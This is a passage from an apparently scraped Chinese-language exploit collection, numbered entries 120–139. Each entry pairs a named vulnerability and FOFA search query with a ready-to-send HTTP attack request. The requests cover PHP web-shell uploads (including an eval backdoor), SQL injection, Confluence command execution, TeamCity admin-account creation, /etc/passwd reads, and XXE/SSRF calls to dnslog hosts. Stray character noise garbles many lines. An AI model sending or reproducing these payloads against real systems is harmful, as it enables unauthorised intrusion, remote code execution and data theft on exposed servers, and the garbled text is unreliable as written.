- K2 k o$ d4 K5 Z3 l7 g120. 北京百绰智能S40管理平台导入web.php任意文件上传
/ r1 j. ]/ g5 ~: W6 wCVE-2024-1253; B$ W# C! ~- W! a
FOFA:title="Smart管理平台"
" C$ f V; n% g z; DPOST /useratte/web.php? HTTP/1.1( E- v* C V! T' C- N i
Host: ip:port
+ |2 ~8 g" B8 ]. M3 n7 @* W& w" zCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db+ k6 v9 F W3 H- f
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
. M+ S; H$ {9 Y- R( {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.85 e3 `* i7 @0 C) V0 I& k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. S/ X3 j. c, w. E/ L/ ?
Accept-Encoding: gzip, deflate
/ J$ L& ~' \6 n) |5 z1 yContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
: `8 A5 a( g4 bContent-Length: 597* o, R5 O' Z& e6 e
Origin: https://ip:port+ T: X# L& ?( P) O# ?3 ?' v
Referer: https://ip:port/sysmanage/licence.php1 a- |5 J. x& ]$ s6 G9 a
Upgrade-Insecure-Requests: 16 s l5 n( N% G6 I; e8 z' l7 s9 F
Sec-Fetch-Dest: document
, |* ^- L7 f) I2 Z" WSec-Fetch-Mode: navigate* I0 S' @; x& Q o& R8 J8 G
Sec-Fetch-Site: same-origin
" G c, O& c; J0 NSec-Fetch-User: ?1
0 N2 x% C0 x8 i4 N. d9 j: `! @( R& lTe: trailers
G# ^0 U8 `2 B: r" QConnection: close0 h7 p4 T) f& n' v
2 Q. w; S) r, ?) ^-----------------------------42328904123665875270630079328# O" E7 ]# q$ [ h( Y
Content-Disposition: form-data; name="file_upload"; filename="2.php"$ h% s- S5 D: p* C8 O
Content-Type: application/octet-stream6 V" d \2 X0 S- m; j2 ]$ M
: m) @( |; W8 F' U<?php phpinfo()?>
' m/ ^( J( v3 x _/ N" M-----------------------------42328904123665875270630079328
% D! s" q3 }- H. d* M! hContent-Disposition: form-data; name="id_type"
5 |/ w- {" r6 [: m* K# b: o- p$ D% p L7 v1 t" s) I
1
: c }( S2 M4 t-----------------------------42328904123665875270630079328
2 o7 W$ W. }+ c' ~4 u2 u8 BContent-Disposition: form-data; name="1_ck", q2 V7 g8 O, y
+ ^; M, |1 g8 P5 t6 B
1_radhttp
6 F! O0 I) H/ A; f-----------------------------42328904123665875270630079328
/ u4 w7 {5 n0 X2 y2 VContent-Disposition: form-data; name="mode"1 \) U- S* Z; ^" o% Q4 Q
' h, {3 B9 [; F# a/ o/ n( nimport: r) T: `' f6 `+ C
-----------------------------42328904123665875270630079328
- ^4 J9 X, C* H9 l' a. o9 z l
0 c/ A$ l5 i B( P i/ H% j4 l4 J7 {, {5 S* V( A
文件路径/upload/2.php
* z) {6 c/ i& u& f6 M$ r% V; e; c+ s( n" g9 m
121. 北京百绰智能S42管理平台userattestation.php任意文件上传$ b4 R* B" u; u- J C2 Z
CVE-2024-1918# F; Y' C/ p! h- C! B
FOFA:title="Smart管理平台"& Y5 E( Q- v/ b* g" x' C/ ]
POST /useratte/userattestation.php HTTP/1.1
* T' m, @% n. C) z& ?# U& a, R* c: oHost: 192.168.40.130:8443
" L" d! x9 i. z0 PCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50- \: a& I/ v% V e2 ?
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
, J8 z: O* z# Q: k, M$ j2 k, cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 i; Q, g% O" m* Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- `2 Y! z" K- R8 PAccept-Encoding: gzip, deflate% b! t" G& I9 s6 b' ^
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
; g; S x9 s; M$ }- MContent-Length: 5928 }6 U: O% h; W" d
Origin: https://192.168.40.130:8443
% E- q" l8 O7 w5 ^6 OUpgrade-Insecure-Requests: 1
) y' ?* p% Q4 q! ~; vSec-Fetch-Dest: document
5 v$ a, I% Y1 H. Z7 dSec-Fetch-Mode: navigate
5 P+ x; M9 i+ M5 ~; m9 |Sec-Fetch-Site: same-origin
# z6 O0 _2 @$ r2 R! e. v0 JSec-Fetch-User: ?1
O$ g! R. L) HTe: trailers' T0 X4 `$ T' O) L3 w
Connection: close5 s, \; L, m- f/ k1 [
7 F9 U. ~. _. i8 w- t2 e* s-----------------------------42328904123665875270630079328
; S. H- F4 d/ ?+ l/ i. s0 vContent-Disposition: form-data; name="web_img"; filename="1.php"
& M7 Y2 s4 o$ {) m7 c2 X* mContent-Type: application/octet-stream
" a2 o3 X+ f0 ?3 Y- X8 x8 E& i1 f* s" J, c1 g( \
<?php phpinfo();?>
, }! P. S/ M+ {* }9 k; q" C-----------------------------42328904123665875270630079328
4 @) Q+ [# v$ b- i; AContent-Disposition: form-data; name="id_type"
% z2 m% O% P( S( Y, X5 e+ c2 q5 ~- e- N- O3 m8 T) h
1
- F. N! G- t% v" E- W-----------------------------42328904123665875270630079328
: \5 {; M4 U$ O& i/ n i. t8 ` E$ GContent-Disposition: form-data; name="1_ck"
8 s7 g( n; N/ q0 u8 u( _8 K
( y! ^/ t$ ?! J. J8 I7 A1 U8 g( r1_radhttp0 B- i6 q: [, c7 j1 ]/ |# {
-----------------------------42328904123665875270630079328
# b0 E8 x$ _2 _Content-Disposition: form-data; name="hidwel"
0 |; `. D* @9 T2 E8 T5 K! K8 ?9 ]
set
% @! @' ~0 v1 h3 O0 F-----------------------------42328904123665875270630079328; Q- b3 g* H. U# r( K: G: f8 k
0 k* M) C3 x( a& L0 Z5 n! w( `" D$ K& O2 r
boot/web/upload/weblogo/1.php# y$ r" L/ }2 N: Q- R! D2 E
6 l! n5 P. c( ^122. 北京百绰智能s200管理平台/importexport.php sql注入. t3 x1 V/ e" d6 t* a z4 f# r- i
CVE-2024-27718FOFA:title="Smart管理平台"
1 I$ {" x x- d其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
0 r' R) a9 C) `- Z, p) {- x( ]GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1. `( G7 g" K6 s7 `! R2 C5 [
Host: x.x.x.x3 [0 s* M- g' W8 m _ l
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
# M1 i/ B3 X8 q9 O, N2 O; nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
% l* Q& ?# W7 K. Z7 X' B8 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 ^. C1 Y# n4 y7 \ S3 ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 t6 W0 m) x9 }- n2 C* ~6 M
Accept-Encoding: gzip, deflate, br2 t/ h) |" ^. {2 L( [
Upgrade-Insecure-Requests: 1
( o/ A0 ~+ Z4 ^% a" PSec-Fetch-Dest: document
8 l3 o+ C- Q1 K$ ]8 {5 CSec-Fetch-Mode: navigate9 ?& V9 g, ~. R% |3 P
Sec-Fetch-Site: none2 m- g# c: o+ b$ ~* @5 |
Sec-Fetch-User: ?1
7 I3 K) j- M$ }( j' |: C; J% F- mTe: trailers. I8 c5 W% K; F) Y
Connection: close# d( q. o; ]: \! s& k# P1 o5 b( H
7 |; |1 x" |0 O$ f4 z, \: N1 f" A
. f. \$ Y7 C- O; W# U0 e123. Atlassian Confluence 模板注入代码执行
2 }6 z" z; h) }% rFOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
& Z8 ?9 K5 X& k8 w9 n9 [POST /template/aui/text-inline.vm HTTP/1.1
m- j+ F# a3 B+ z4 o" b- j. y, d/ {Host: localhost:80906 q ?0 q9 X- f9 x" `& Q
Accept-Encoding: gzip, deflate, br
! C1 `3 b# W0 n6 L5 mAccept: */*
' j! B8 s6 Q* z VAccept-Language: en-US;q=0.9,en;q=0.89 F$ [* Y5 H" S9 n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36- K/ P6 X9 y) t( M( F
Connection: close
% p. W. @, J3 ^" I( A: u0 }Content-Type: application/x-www-form-urlencoded
; [8 }3 R- n' P9 T% x2 C
) F: z* v" z1 o5 Y8 B7 Q" Z, u2 Rlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
& X; K* |2 }& c
8 F" b# m3 M( {: A7 J3 o! w# {% `9 V; G& a! v
124. 湖南建研工程质量检测系统任意文件上传) d+ G7 a* N9 ^% k* w# X
FOFA:body="/Content/Theme/Standard/webSite/login.css"
! K$ }1 Q( u* q2 S. y, e2 ePOST /Scripts/admintool?type=updatefile HTTP/1.1- j7 U6 q( K$ J
Host: 192.168.40.130:8282' C. {0 _3 R: N
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
4 m% h# R) x7 ?# A. ?Content-Length: 72. V% U0 u: b9 q+ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
- e# b! m( y" HAccept-Encoding: gzip, deflate, br# Y: @, L' V4 K4 B' G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" w0 z7 y" [$ M4 [1 m& q8 t H0 r- K6 g' @Connection: close
4 K& A" _" ~. c( ^/ GContent-Type: application/x-www-form-urlencoded
+ I. L$ B: P* s4 C% {9 u0 I: e* `, m+ C& F; ^
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>. \( R5 T: z4 l+ T: {1 {" J
( K( e3 x( c) |/ s7 Y) u" `4 ]% y/ {
6 Z! M: O9 Q/ Q$ Uhttp://192.168.40.130:8282/Scripts/abcgcg.aspx( s1 C" T5 |) H- B' u
# Y4 z( D! W! P O
125. ConnectWise ScreenConnect身份验证绕过3 ^8 ~% x9 @% k0 f. `0 o% ?7 e3 g
CVE-2024-17098 N7 `( q+ m& k' h
FOFA:icon_hash="-82958153"7 h/ {" Y% r/ X
https://github.com/watchtowrlabs ... bypass-add-user-poc
! @' U- q) x* ~8 j; B8 ^( W8 [5 w) Z( A X; P* B
, L; T2 J2 p5 }( p4 c! v8 C7 k
使用方法
* y& N0 f) n) I* L5 \/ _0 }! ?; epython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
2 j. K5 {! f+ L' u0 j
6 M \+ I3 c' _
$ _6 q" P8 ]6 ` y- N& D创建好用户后直接登录后台,可以执行系统命令。
% P: o1 r! S) r; A' e$ k! i$ e H/ @ l0 J: i& d
126. Aiohttp 路径遍历
9 Z7 V+ E6 g( Q. x% m6 |5 sFOFA:title=="ComfyUI"
: i2 [" z. c0 r) E5 LGET /static/../../../../../etc/passwd HTTP/1.1$ n7 Z, `; S$ C" s' d5 w
Host: x.x.x.x. B0 s% h. ? C$ e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
6 T: w* G1 R! I- n h( Q: t" w) JConnection: close- ~3 ~* F7 u- x( L: |# P0 |
Accept: */*
% }, V6 [* o8 R# Q' DAccept-Language: en
- J' e c+ ?* `' C5 hAccept-Encoding: gzip
& U6 a6 W; U, V- ]9 ]) J+ g; Z& H1 S/ t- q3 v. {( E0 x
; L z$ ?6 w) M, L) ~- M1 I8 |* O) i
127. 广联达Linkworks DataExchange.ashx XXE& g* @. @. d* b/ `) F9 {" A3 I. _& ?
FOFA:body="Services/Identification/login.ashx" ! l' E3 U* ]' j |
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.16 g/ T1 l1 F% o4 N. a
Host: 192.168.40.130:8888( [/ i$ O4 ~( @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
& w0 [0 P7 J/ E: p4 bContent-Length: 415; B" s+ I) {# y/ |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- `0 s& S8 I# v( \- Y( SAccept-Encoding: gzip, deflate J3 ^4 Q( ]4 ?0 ]
Accept-Language: zh-CN,zh;q=0.9
, g$ z% A4 C4 c( rConnection: close
6 O+ P6 D* D! s7 r5 xContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
2 |) j' I: l4 e4 {1 WPurpose: prefetch
! k) {: |+ c' s& T2 g9 p5 OSec-Purpose: prefetch;prerender
) h' n2 c u. b! S3 k `. g* b( N: z0 K3 \% Z
------WebKitFormBoundaryJGgV5l5ta05yAIe0& r1 b! N/ B. q( [$ R
Content-Disposition: form-data;name="SystemName"
3 `% d* h2 W7 J% M6 z' ]( f$ \' A/ N+ V
BIM2 L% T/ g6 Y% ^, J9 k6 H
------WebKitFormBoundaryJGgV5l5ta05yAIe0! f9 w5 A1 R' B4 T/ N9 G9 W7 \
Content-Disposition: form-data;name="Params"
0 U3 a" d# |- yContent-Type: text/plain$ \) D$ t2 t2 K7 i
9 x$ B$ F4 h7 _7 R3 b
<?xml version="1.0" encoding="UTF-8"?>9 }. ^2 m" R* y9 f
<!DOCTYPE test [
. Y, \8 |6 M7 R, Q4 r<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
; @' {: m' ~5 N% Z( M]5 h4 \+ T5 m3 E) O# W5 o
>$ w! N _9 E/ w/ d7 ]) o$ q8 o
<test>&t;</test>; Z* D8 z, a' o$ j5 W
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
/ l' m. ~* v' U6 z+ q
P' R1 w% ~: U. ? V' u; {
, ^6 u7 |% p3 ~* [
* U/ `0 O+ w4 `8 j0 h% `" I128. Adobe ColdFusion 反序列化
) P0 s3 }2 N! m R0 ~CVE-2023-38203
: b5 I9 ?7 c8 y' ~0 q: VAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
% m: F" W% D* A) DFOFA:app="Adobe-ColdFusion"
# w& L4 R& Q3 e {) h5 p/ N1 RPAYLOAD
7 Q: b% t% E% Y9 @6 P+ w. Y
/ N8 O7 A* F% s+ o1 i$ n3 n% z129. Adobe ColdFusion 任意文件读取
* m8 h8 u, w& cCVE-2024-20767
1 q9 l# X; S& p8 o# [; H/ ]5 s9 vFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request". M/ H9 Y0 q, A3 U/ P) X
第一步,获取uuid) s5 S" R \9 ?3 @+ f- R4 m
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
& |. @1 c; A) JHost: x.x.x.x. N/ r' P- u3 s8 Y1 Z. V) A( c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) m3 g% [. _) _: aAccept: */*& P- y: p* E6 H1 F5 t6 I; L# `
Accept-Encoding: gzip, deflate
) _, F( H; D& P; {1 s' ZConnection: close
* c; D- T% T. K1 Z
: F. }% T& h( T
* T& Y l9 `4 o4 M第二步,读取/etc/passwd文件! Y5 w* |4 G! f
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1- R& x7 @5 ^1 C/ t; y1 F% h1 h8 {
Host: x.x.x.x
, w1 n8 O" I: X7 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
, a9 h6 G3 l' ~8 ?1 t/ LAccept: */*1 Q5 y o3 F" {" S0 A
Accept-Encoding: gzip, deflate
+ y3 _) k0 d* B0 wConnection: close5 A. m/ f/ ?" K- G( ]. t
uuid: 85f60018-a654-4410-a783-f81cbd5000b9. `2 L1 y5 B" Q I( g( A S
7 _: }! x* W/ L* r! `, n
( {/ B( R2 e8 X7 H8 ]( G130. Laykefu客服系统任意文件上传5 G; q# p( F' o2 s3 p( u% d& X+ l
FOFA:icon_hash="-334624619"0 n" ^- k' Q2 X
POST /admin/users/upavatar.html HTTP/1.18 u {3 s7 _+ e: d
Host: 127.0.0.11 i/ m3 \- @: H0 z
Accept: application/json, text/javascript, */*; q=0.017 I% Q3 U1 P* F9 s* ^( o
X-Requested-With: XMLHttpRequest! e4 d! P% C9 G$ B( J/ _9 Q& u- @
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
( c* Q! N1 T9 b: Y2 p* c! RContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR6 f7 U& I# v" E) o: M% l0 n& e8 T
Accept-Encoding: gzip, deflate
$ Q. \) d# k1 {4 }7 h6 W0 XAccept-Language: zh-CN,zh;q=0.9' y0 g' X* T/ i; ?
Cookie: user_name=1; user_id=3
0 z8 q2 q2 h! R- v* x, c: NConnection: close [! S+ }, L; x4 w: o% |
: G% P5 ] a# ^/ K9 C. e; J------WebKitFormBoundary3OCVBiwBVsNuB2kR
+ |/ l% k4 \ W* m4 uContent-Disposition: form-data; name="file"; filename="1.php"& P2 ~% n8 q7 m: Q# l
Content-Type: image/png
5 \+ A, h7 V! j6 p5 u" z3 i
* w; o) T# ~" P; F* U/ P" k/ E+ ^1 r<?php phpinfo();@eval($_POST['sec']);?>
" W& ~& |) s1 {------WebKitFormBoundary3OCVBiwBVsNuB2kR--
8 G# V; M) S5 \/ T ^ y9 ^; O8 |; _ ]9 g$ p1 o6 g" y
" j- G M) L+ ?- b4 [# m9 h* q131. Mini-Tmall <=20231017 SQL注入
9 B, H9 p m$ KFOFA:icon_hash="-2087517259"
3 m& h0 X" o9 M4 P$ X4 o' f( @后台地址:http://localhost:8080/tmall/admin( E$ c. |- T# x0 b
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)% G- ^. U% {- n
' C" l' q1 c8 Z3 u* H! P7 ?, P132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过) a: q9 j3 B8 s1 s8 k: x a
CVE-2024-27198
' W. `$ m& ]+ J6 ` R+ h3 QFOFA:body="Log in to TeamCity"' v+ Q( ^3 @5 S/ c
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1! i% H) B3 s) u2 r: P1 S
Host: 192.168.40.130:8111 ~; l4 }) O3 K3 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 A1 _, r5 l4 f* H! g; u/ p# }1 GAccept: */*
9 O# Z! h' P+ J- b2 Q, `Content-Type: application/json7 x+ R- m. t! v
Accept-Encoding: gzip, deflate2 W. T$ J9 N; _ g4 V
W8 y+ e8 o9 G2 Y{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}# v' E0 W5 N, }; l: v3 b
9 ^0 ]8 I4 J% v' K: ~, E7 T, [# B; M8 D: r9 N
CVE-2024-27199
l1 t& Z1 ~+ _* K8 N' Y' B/res/../admin/diagnostic.jsp1 F# s; h& S& \2 O, H" Q# ~; z3 p
/.well-known/acme-challenge/../../admin/diagnostic.jsp5 S7 H" \. R5 A3 ^# N+ ^: Q
/update/../admin/diagnostic.jsp
# a. R7 Y) w- f( {( W; d3 ]6 P$ a5 A+ b9 C4 d; A C, Y2 x
) Y& ~8 r6 r6 n" R6 d5 \( r
CVE-2024-27198-RCE.py
2 z8 Z( S0 T8 z5 O! I3 t5 m
; E7 a( G4 q+ j2 ]7 ]7 t133. H5 云商城 file.php 文件上传9 V r6 [" s/ O
FOFA:body="/public/qbsp.php"
8 \# z9 f; L8 O3 z% pPOST /admin/commodtiy/file.php?upload=1 HTTP/1.14 F7 {+ R1 ^* ~& G7 V
Host: your-ip
9 i5 U" t# Z% A kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
) A; B5 ]9 h* W$ P M. R5 dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx* ?& p9 z, h6 }; T9 Y& w7 X
; s/ C3 W* h8 @9 D$ S2 s# X4 v. k
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
! p; `+ {- r* D* z* DContent-Disposition: form-data; name="file"; filename="rce.php"
- ]6 ~$ \ M. T% M3 z' G( S- \Content-Type: application/octet-stream
1 } A& p) |6 Q5 i
: s0 n, F( {' k* d% I0 c<?php system("cat /etc/passwd");unlink(__FILE__);?>
L5 g9 _: M. k' |------WebKitFormBoundaryFQqYtrIWb8iBxUCx--8 g( V. K& {0 y1 E/ Y' \' n
! \1 w e% q; O3 w5 P0 o% ~3 Y. |( M0 o# l, y0 _7 [
& v8 g5 D$ q; u# ^9 Y5 i1 y/ z134. 网康NS-ASG应用安全网关index.php sql注入: d! t& v$ T( W% A5 b( H7 H
CVE-2024-2330
' p* P8 r4 h3 v1 f9 ^/ zNetentsec NS-ASG Application Security Gateway 6.3版本$ t0 C, q6 F, T8 t7 f! r+ N/ t
FOFA:app="网康科技-NS-ASG安全网关"% _+ ^6 X3 r1 [; [& `5 D
POST /protocol/index.php HTTP/1.1
, ~- l6 I, h! WHost: x.x.x.x
0 J8 B$ m, ^, z k6 ^Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
0 }' f$ y* s/ {& u2 [( S3 EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.08 l) e- j& |" ^7 R/ W( e- P6 a9 s O
Accept: */*( L% I# b3 _5 d( Q i3 _, A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 J3 w" K! t- v
Accept-Encoding: gzip, deflate
4 b6 X+ U+ _: \7 }/ w6 zSec-Fetch-Dest: empty
5 }% q0 H' o0 ? |Sec-Fetch-Mode: cors4 d9 A) J% x* a3 _
Sec-Fetch-Site: same-origin6 f* t, N7 R4 Q' j; C8 Y7 K) d& R
Te: trailers( z0 N" t I! L7 f; U
Connection: close1 ^3 U1 ]" O& H; [
Content-Type: application/x-www-form-urlencoded
Q0 N. z5 M- a$ W F7 Y6 kContent-Length: 263
1 X2 c( ]. `; i: c( i* @ k7 T, P' P- w7 U& Y
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
5 n/ [7 T, b6 c# Q1 j" |
\5 s3 `: r6 Y% z- M7 w7 K& U3 Y& |: p
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( [0 K. p) k2 I: E$ S
CVE-2024-2022
; R6 x1 H" t6 P' P1 ~Netentsec NS-ASG Application Security Gateway 6.3版本 p! F" p! h$ b6 i/ d& w
FOFA:app="网康科技-NS-ASG安全网关"
% Q+ m0 D# u8 g/ j0 XGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1& K1 `3 N" g) ]/ [: F d' i
Host: x.x.x.x: m0 t3 {9 c& g8 ~# I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: p* ^9 f% y( x( Q1 \/ o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
3 C H: f) L* |) e @/ Z( d: _Accept-Encoding: gzip, deflate- j% R6 C6 a L A7 d4 W9 Y
Accept-Language: zh-CN,zh;q=0.9
4 t1 b6 h4 Z! a" C$ ~+ e, pConnection: close
6 ~% l, X( r4 D4 H: h1 }
8 V7 j7 g' A% w1 g; D. G$ V
0 W( \8 D2 u4 b% ]136. NextChat cors SSRF- H. H' }9 J I {$ F
CVE-2023-497850 F5 K! c3 I7 V9 B
FOFA:title="NextChat"
8 n, X L5 c: S5 [2 f, FGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
7 Y9 h1 b+ E2 i9 u3 |Host: x.x.x.x:10000
7 T: s) K' h u5 \0 sUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 \: q6 y0 b+ v% K b" c6 i
Connection: close
K( u# V6 u$ p% P( w. b/ TAccept: */*3 E" k* l- H% h5 j% M% z" `* p
Accept-Language: en
1 m2 \' J- w, W% o p* OAccept-Encoding: gzip
O7 H) u; g5 d1 M q$ V% v( e/ q' N( _' K4 Q
" g0 y! |* y6 b5 v6 r' f137. 福建科立迅通信指挥调度平台down_file.php sql注入
6 |( ^6 R; \. {; Q% oCVE-2024-26208 F9 ~# V5 n+ f' L- h; |( G' d& r
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 A" g0 M h' g" ]
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1, a9 O) P- o3 {7 x
Host: x.x.x.x+ l/ i9 h0 ^ u& G( P3 d$ J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: W" J6 Z( o, K7 v( OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' M t3 T' S4 v4 NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 ?- q: |& ^3 d1 G9 D) r& x D4 n
Accept-Encoding: gzip, deflate, br/ v! K1 g) g1 J8 t9 Z" C. G z
Connection: close
" L6 E3 S; p$ F+ [3 o" n0 Z+ b# y+ UCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj6 S( g+ \. |& z" f G" O/ ^- `
Upgrade-Insecure-Requests: 1- d9 y. g# O6 Z; Z( ~) Q+ o
$ b0 J5 J5 K @6 }: q
/ k2 X' S3 ~& X( s/ e& E! _9 z. x
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
- A) v: B4 l. a; R6 m+ j- k2 eCVE-2024-2621
# G3 E/ a2 ?7 d! `4 YFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"6 G2 l. U6 F# p. H) s% O7 F1 L
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
1 M. p ~, a3 i! [8 H+ dHost: x.x.x.x
$ \9 {. J4 @9 V8 C- pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ M5 ^! W4 I- y1 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 H% l/ m8 T1 l/ ?) u2 kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' D6 z/ Z; S+ QAccept-Encoding: gzip, deflate, br
/ O1 K! I: S7 w" h0 f, i% n3 VConnection: close" D2 e6 t. `+ C. K' S& Q7 a* a
Upgrade-Insecure-Requests: 1! v2 T, s0 T5 {, j7 k
6 @# g% n' q! n: v0 f! Q
) M3 |3 g3 K6 x1 c139. 福建科立讯通信指挥调度平台editemedia.php sql注入1 A) i7 l# }5 V9 A4 Y
CVE-2024-2622
9 K& ]: u3 N6 f/ RFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"4 B+ a& X4 V' Z, [ w- X1 E' r* j$ ?
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.17 O) E7 R% t9 L+ {
Host: x.x.x.x
3 w' i" |3 E+ s9 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0# b' l( ~' U5 P- a3 P
